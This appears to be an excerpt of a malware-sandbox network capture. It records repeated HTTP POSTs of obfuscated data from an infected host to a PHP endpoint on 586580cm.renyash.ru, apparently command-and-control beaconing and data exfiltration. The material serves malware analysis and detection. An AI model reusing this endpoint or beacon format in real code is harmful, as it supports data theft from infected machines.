                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4727&min_rtt=1942&rtt_var=6300&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1370&delivery_rate=60258&cwnd=225&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 3b 57 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 4;W^Q0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                133192.168.2.550115104.21.38.8480
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:04:14.083024025 CET286OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1056
                                                                                                                                Expect: 100-continue
                                                                                                                                Jan 11, 2025 15:04:14.439389944 CET1056OUTData Raw: 5f 57 58 5e 5a 5c 58 52 5c 5f 50 57 54 55 59 59 59 52 5b 5c 57 56 54 5a 5b 5a 5b 5b 56 5d 56 54 5a 5f 57 5c 59 5f 5b 59 59 5f 51 55 55 5d 53 58 53 58 59 46 5a 52 5e 5a 50 53 57 51 54 50 5a 46 5e 5d 58 5f 5f 5d 58 51 5e 52 59 5a 5e 5c 5e 59 57 54
                                                                                                                                Data Ascii: _WX^Z\XR\_PWTUYYYR[\WVTZ[Z[[V]VTZ_W\Y_[YY_QUU]SXSXYFZR^ZPSWQTPZF^]X__]XQ^RYZ^\^YWTUTUAXYSZZ\[PQSSY_V[ZBZT^BS[_][YWVSFZZTQ]_WP]YW]\^XQVZHYS[W^\^ZYVW_X_TYCU_YT]WSZQ^XRR^X_VPR_S_QZ]_U\\[^!]&0(?+ !&^&%,=)%=8,7T$/%?'!'/U=.^''P*-
                                                                                                                                Jan 11, 2025 15:04:14.553952932 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 11, 2025 15:04:14.741555929 CET803INHTTP/1.1 200 OK
                                                                                                                                Date: Sat, 11 Jan 2025 14:04:14 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EUJm3vQzCYCBVhsEO8f%2Fc8nPxsRRGkuePRCh03JB2CqUcAxTxZnp0J%2FEQv5%2BBsaqvvmDt%2Bmp5ukbVWtkraKT1LHn6LhzDwWCmQUJ3WLcGM2eEm3i03gwR9699Omc0t9ywA3yWozJ"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 9005746ea9d50c9c-EWR
                                                                                                                                alt-svc: h2=":443"; ma=60
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3267&min_rtt=1647&rtt_var=3858&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1342&delivery_rate=99924&cwnd=240&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 3b 57 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 4;W^Q0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                134192.168.2.550116104.21.38.8480
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:04:14.915350914 CET310OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1060
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 11, 2025 15:04:15.267534018 CET1060OUTData Raw: 5f 5f 5d 55 5f 58 58 5d 5c 5f 50 57 54 52 59 5a 59 54 5b 5c 57 57 54 5d 5b 5a 5b 5b 56 5d 56 54 5a 5f 57 5c 59 5f 5b 59 59 5f 51 55 55 5d 53 58 53 58 59 46 5a 52 5e 5a 50 53 57 51 54 50 5a 46 5e 5d 58 5f 5f 5d 58 51 5e 52 59 5a 5e 5c 5e 59 57 54
                                                                                                                                Data Ascii: __]U_XX]\_PWTRYZYT[\WWT][Z[[V]VTZ_W\Y_[YY_QUU]SXSXYFZR^ZPSWQTPZF^]X__]XQ^RYZ^\^YWTUTUAXYSZZ\[PQSSY_V[ZBZT^BS[_][YWVSFZZTQ]_WP]YW]\^XQVZHYS[W^\^ZYVW_X_TYCU_YT]WSZQ^XRR^X_VPR_S_QZ]_U\\[^!2,?T(Z410'=)*] U#)0/1(@7[6(+.^''P*
                                                                                                                                Jan 11, 2025 15:04:15.368851900 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 11, 2025 15:04:15.627168894 CET803INHTTP/1.1 200 OK
                                                                                                                                Date: Sat, 11 Jan 2025 14:04:15 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=96njyfL%2BdisPWlO9vEli3GmqoP3DrpsoZVkR3W1Q%2F4em8Ibg0aC9XQA7ZqFUBSHzQ4pkF3%2BTeyRgXsjRqajbbU9QKk0o%2FGqCE2XrbBewsUXp33nl0XNlu62QjQxiWLbz7bG0wiJH"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 90057473c93a43ac-EWR
                                                                                                                                alt-svc: h2=":443"; ma=60
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4531&min_rtt=1721&rtt_var=6265&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1370&delivery_rate=60325&cwnd=187&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 3b 57 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 4;W^Q0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                135192.168.2.550117104.21.38.8480
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:04:15.755599022 CET310OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1060
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 11, 2025 15:04:16.111243963 CET1060OUTData Raw: 5a 54 58 5a 5a 58 58 52 5c 5f 50 57 54 53 59 5b 59 57 5b 5c 57 52 54 5b 5b 5a 5b 5b 56 5d 56 54 5a 5f 57 5c 59 5f 5b 59 59 5f 51 55 55 5d 53 58 53 58 59 46 5a 52 5e 5a 50 53 57 51 54 50 5a 46 5e 5d 58 5f 5f 5d 58 51 5e 52 59 5a 5e 5c 5e 59 57 54
                                                                                                                                Data Ascii: ZTXZZXXR\_PWTSY[YW[\WRT[[Z[[V]VTZ_W\Y_[YY_QUU]SXSXYFZR^ZPSWQTPZF^]X__]XQ^RYZ^\^YWTUTUAXYSZZ\[PQSSY_V[ZBZT^BS[_][YWVSFZZTQ]_WP]YW]\^XQVZHYS[W^\^ZYVW_X_TYCU_YT]WSZQ^XRR^X_VPR_S_QZ]_U\\[^!X'0 ? ^ !*Z0%=:%* )*'?:V+6^5$7U);.^''P*=
                                                                                                                                Jan 11, 2025 15:04:16.218905926 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 11, 2025 15:04:16.472031116 CET808INHTTP/1.1 200 OK
                                                                                                                                Date: Sat, 11 Jan 2025 14:04:16 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=s6pYvl19ibVFNyCNxRUzv6%2BWzIswygbAvf7gzDC0%2FpxaTqLNN7PM2tvpjO6wSW2QZlrSyNUrhQK57VdddxPfAMs%2BJHaM%2By4NwI6JCa7PdFB5J6CQfYy5CSHaeS7EVx5EU%2FDEqQ%2Fm"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 90057479194b42ad-EWR
                                                                                                                                alt-svc: h2=":443"; ma=60
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=7991&min_rtt=1677&rtt_var=13258&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1370&delivery_rate=27972&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 3b 57 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 4;W^Q0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                136192.168.2.550118104.21.38.8480
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:04:16.604978085 CET310OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1060
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 11, 2025 15:04:16.955086946 CET1060OUTData Raw: 5a 53 5d 5f 5a 5f 5d 54 5c 5f 50 57 54 51 59 5c 59 51 5b 58 57 53 54 5a 5b 5a 5b 5b 56 5d 56 54 5a 5f 57 5c 59 5f 5b 59 59 5f 51 55 55 5d 53 58 53 58 59 46 5a 52 5e 5a 50 53 57 51 54 50 5a 46 5e 5d 58 5f 5f 5d 58 51 5e 52 59 5a 5e 5c 5e 59 57 54
                                                                                                                                Data Ascii: ZS]_Z_]T\_PWTQY\YQ[XWSTZ[Z[[V]VTZ_W\Y_[YY_QUU]SXSXYFZR^ZPSWQTPZF^]X__]XQ^RYZ^\^YWTUTUAXYSZZ\[PQSSY_V[ZBZT^BS[_][YWVSFZZTQ]_WP]YW]\^XQVZHYS[W^\^ZYVW_X_TYCU_YT]WSZQ^XRR^X_VPR_S_QZ]_U\\[^!2<Y(<4&Z&%;?):*(<#:"V$/%+%#X!8*.^''P*5
                                                                                                                                Jan 11, 2025 15:04:17.048996925 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 11, 2025 15:04:17.228394985 CET804INHTTP/1.1 200 OK
                                                                                                                                Date: Sat, 11 Jan 2025 14:04:17 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ggb7lPEjLv7ognhxcb0kErNHlfyJaKlQHFtmxi7hh%2BngQOeAzhyPyvmbC8jWsWeRXwfxXvkcR3ZG72R1PQ1NDIV7sZSCTAHwHRusisuVQiDVRp%2BdV0z1o90l%2B7lEEfhW51%2F8FCmy"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 9005747e4ca87c99-EWR
                                                                                                                                alt-svc: h2=":443"; ma=60
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3479&min_rtt=1937&rtt_var=3810&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1370&delivery_rate=102283&cwnd=234&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 3b 57 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 4;W^Q0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                137192.168.2.550119104.21.38.8480
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:04:17.280772924 CET310OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1776
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive


                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                138192.168.2.550120104.21.38.8480
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:04:17.369035006 CET310OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1060
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 11, 2025 15:04:17.720639944 CET1060OUTData Raw: 5a 50 5d 55 5f 5e 58 57 5c 5f 50 57 54 52 59 5f 59 54 5b 5d 57 56 54 59 5b 5a 5b 5b 56 5d 56 54 5a 5f 57 5c 59 5f 5b 59 59 5f 51 55 55 5d 53 58 53 58 59 46 5a 52 5e 5a 50 53 57 51 54 50 5a 46 5e 5d 58 5f 5f 5d 58 51 5e 52 59 5a 5e 5c 5e 59 57 54
                                                                                                                                Data Ascii: ZP]U_^XW\_PWTRY_YT[]WVTY[Z[[V]VTZ_W\Y_[YY_QUU]SXSXYFZR^ZPSWQTPZF^]X__]XQ^RYZ^\^YWTUTUAXYSZZ\[PQSSY_V[ZBZT^BS[_][YWVSFZZTQ]_WP]YW]\^XQVZHYS[W^\^ZYVW_X_TYCU_YT]WSZQ^XRR^X_VPR_S_QZ]_U\\[^!\%04^?2 7:&%*:"+;0U#%3U<&;Y!47>.^''P*
                                                                                                                                Jan 11, 2025 15:04:17.888659954 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 11, 2025 15:04:18.068181992 CET803INHTTP/1.1 200 OK
                                                                                                                                Date: Sat, 11 Jan 2025 14:04:18 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hssW0UxjhIrZRsnd7RQblq72stSteyABhDrqkzsiKnhF443FBAxbL2EW3aT91AZn%2F7GSr%2BC5gz3XeJYngT%2BTHh5nb0IJ8zDhbFYRmrCq2LVR0MIfPcjtgjMPJsyO8%2FMF00vPy82R"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 9005748388d141db-EWR
                                                                                                                                alt-svc: h2=":443"; ma=60
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4683&min_rtt=2098&rtt_var=5957&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1370&delivery_rate=64085&cwnd=234&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 3b 57 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 4;W^Q0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                139192.168.2.550121104.21.38.8480
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:04:18.198833942 CET286OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1060
                                                                                                                                Expect: 100-continue
                                                                                                                                Jan 11, 2025 15:04:18.548718929 CET1060OUTData Raw: 5a 57 5d 55 5f 5e 58 55 5c 5f 50 57 54 56 59 5b 59 57 5b 5f 57 51 54 50 5b 5a 5b 5b 56 5d 56 54 5a 5f 57 5c 59 5f 5b 59 59 5f 51 55 55 5d 53 58 53 58 59 46 5a 52 5e 5a 50 53 57 51 54 50 5a 46 5e 5d 58 5f 5f 5d 58 51 5e 52 59 5a 5e 5c 5e 59 57 54
                                                                                                                                Data Ascii: ZW]U_^XU\_PWTVY[YW[_WQTP[Z[[V]VTZ_W\Y_[YY_QUU]SXSXYFZR^ZPSWQTPZF^]X__]XQ^RYZ^\^YWTUTUAXYSZZ\[PQSSY_V[ZBZT^BS[_][YWVSFZZTQ]_WP]YW]\^XQVZHYS[W^\^ZYVW_X_TYCU_YT]WSZQ^XRR^X_VPR_S_QZ]_U\\[^!&<(^4">$4X?:6)+ W _!',>+6X!7V);.^''P*)
                                                                                                                                Jan 11, 2025 15:04:18.652546883 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 11, 2025 15:04:18.900551081 CET805INHTTP/1.1 200 OK
                                                                                                                                Date: Sat, 11 Jan 2025 14:04:18 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OrOc7TpYuyx3U2T7OLgbX0aHbX9K%2B5OUPb%2FvCU48SLkOgdKMZOtSYnyx5%2BZvLrLg3QO7nJSWos16g5J34oXd%2FrfyRWwGjBrhGZZb7KhgR04GCp6Y0LE0eQzIlvWHzDdxxwhoc%2F0N"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 90057488492c431c-EWR
                                                                                                                                alt-svc: h2=":443"; ma=60
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4717&min_rtt=2204&rtt_var=5852&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1346&delivery_rate=65444&cwnd=236&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 3b 57 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 4;W^Q0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                140192.168.2.550122104.21.38.8480
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:04:19.030661106 CET310OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1056
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 11, 2025 15:04:19.377002954 CET1056OUTData Raw: 5a 50 5d 5c 5f 5b 58 50 5c 5f 50 57 54 55 59 53 59 57 5b 5d 57 52 54 5a 5b 5a 5b 5b 56 5d 56 54 5a 5f 57 5c 59 5f 5b 59 59 5f 51 55 55 5d 53 58 53 58 59 46 5a 52 5e 5a 50 53 57 51 54 50 5a 46 5e 5d 58 5f 5f 5d 58 51 5e 52 59 5a 5e 5c 5e 59 57 54
                                                                                                                                Data Ascii: ZP]\_[XP\_PWTUYSYW[]WRTZ[Z[[V]VTZ_W\Y_[YY_QUU]SXSXYFZR^ZPSWQTPZF^]X__]XQ^RYZ^\^YWTUTUAXYSZZ\[PQSSY_V[ZBZT^BS[_][YWVSFZZTQ]_WP]YW]\^XQVZHYS[W^\^ZYVW_X_TYCU_YT]WSZQ^XRR^X_VPR_S_QZ]_U\\[^!Y%$<1' !._3%$)^*(7T$<"R*&8!7*;.^''P*
                                                                                                                                Jan 11, 2025 15:04:19.502163887 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 11, 2025 15:04:19.769623041 CET808INHTTP/1.1 200 OK
                                                                                                                                Date: Sat, 11 Jan 2025 14:04:19 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Shi2lfvId%2FgJMeuXlqe4Yc0ZXlT8sdP%2Bsx559e0A%2BCL0hEAAm74eempg4a6NjNY4EKEtu4Buc4%2F4TeWiQTZdVwqAiT5lk%2Bppzj62L9xexwiaYPaBWIcnWIHRZ7Q7p3Y%2FDc302ybY"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 9005748d9ffbc35a-EWR
                                                                                                                                alt-svc: h2=":443"; ma=60
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=8155&min_rtt=1676&rtt_var=13588&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1366&delivery_rate=27282&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 3b 57 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 4;W^Q0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                141192.168.2.550123104.21.38.8480
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:04:19.898488998 CET310OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1060
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 11, 2025 15:04:20.251976013 CET1060OUTData Raw: 5f 5e 58 5f 5f 5e 58 54 5c 5f 50 57 54 53 59 5f 59 5c 5b 51 57 5e 54 5c 5b 5a 5b 5b 56 5d 56 54 5a 5f 57 5c 59 5f 5b 59 59 5f 51 55 55 5d 53 58 53 58 59 46 5a 52 5e 5a 50 53 57 51 54 50 5a 46 5e 5d 58 5f 5f 5d 58 51 5e 52 59 5a 5e 5c 5e 59 57 54
                                                                                                                                Data Ascii: _^X__^XT\_PWTSY_Y\[QW^T\[Z[[V]VTZ_W\Y_[YY_QUU]SXSXYFZR^ZPSWQTPZF^]X__]XQ^RYZ^\^YWTUTUAXYSZZ\[PQSSY_V[ZBZT^BS[_][YWVSFZZTQ]_WP]YW]\^XQVZHYS[W^\^ZYVW_X_TYCU_YT]WSZQ^XRR^X_VPR_S_QZ]_U\\[^"20(18^4!)0%Y*:>>8 %'?U*6?"7W=.^''P*=
                                                                                                                                Jan 11, 2025 15:04:20.354547977 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 11, 2025 15:04:20.539002895 CET804INHTTP/1.1 200 OK
                                                                                                                                Date: Sat, 11 Jan 2025 14:04:20 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ghnDgm7lbW4rJJwhKsQiT78%2BbFQ5uczt4jrv6MaS5cWZQzm%2Bhgr69iI4kS9aclZpKpZhx8yM%2F2Nd%2FcmVoumwxhVya8t8IgifobEdbY4GfgKS2zCViBxVpAsKYoYjgV4Ma9YmOZIP"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 90057492fe59c439-EWR
                                                                                                                                alt-svc: h2=":443"; ma=60
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=8176&min_rtt=1542&rtt_var=13847&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1370&delivery_rate=26731&cwnd=206&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 3b 57 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 4;W^Q0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                142192.168.2.550124104.21.38.8480
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:04:20.671196938 CET310OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1060
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 11, 2025 15:04:21.017755032 CET1060OUTData Raw: 5f 53 5d 55 5f 5b 58 56 5c 5f 50 57 54 56 59 5b 59 55 5b 5e 57 57 54 5e 5b 5a 5b 5b 56 5d 56 54 5a 5f 57 5c 59 5f 5b 59 59 5f 51 55 55 5d 53 58 53 58 59 46 5a 52 5e 5a 50 53 57 51 54 50 5a 46 5e 5d 58 5f 5f 5d 58 51 5e 52 59 5a 5e 5c 5e 59 57 54
                                                                                                                                Data Ascii: _S]U_[XV\_PWTVY[YU[^WWT^[Z[[V]VTZ_W\Y_[YY_QUU]SXSXYFZR^ZPSWQTPZF^]X__]XQ^RYZ^\^YWTUTUAXYSZZ\[PQSSY_V[ZBZT^BS[_][YWVSFZZTQ]_WP]YW]\^XQVZHYS[W^\^ZYVW_X_TYCU_YT]WSZQ^XRR^X_VPR_S_QZ]_U\\[^!^&7?2^ "=$5=)>(<P ).U3.R+<5'4(;.^''P*)
                                                                                                                                Jan 11, 2025 15:04:21.115124941 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 11, 2025 15:04:21.374802113 CET805INHTTP/1.1 200 OK
                                                                                                                                Date: Sat, 11 Jan 2025 14:04:21 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GqsIUadN%2BTlAja4wyGRUILl1ucnfBakE%2FJY%2BhQDci6JwQuDNfofHdCBROuppp4AXSpRK4%2BmUbIAis8opjPczq8ZEaWLue9LEbcpyAu4jZSyKBP9kBED5Qz3vbrmweJ%2BF62BBJhY8"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 90057497ba888c11-EWR
                                                                                                                                alt-svc: h2=":443"; ma=60
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=5065&min_rtt=2008&rtt_var=6868&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1370&delivery_rate=55158&cwnd=202&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 3b 57 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 4;W^Q0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                143192.168.2.550125104.21.38.8480
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:04:21.508919001 CET310OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
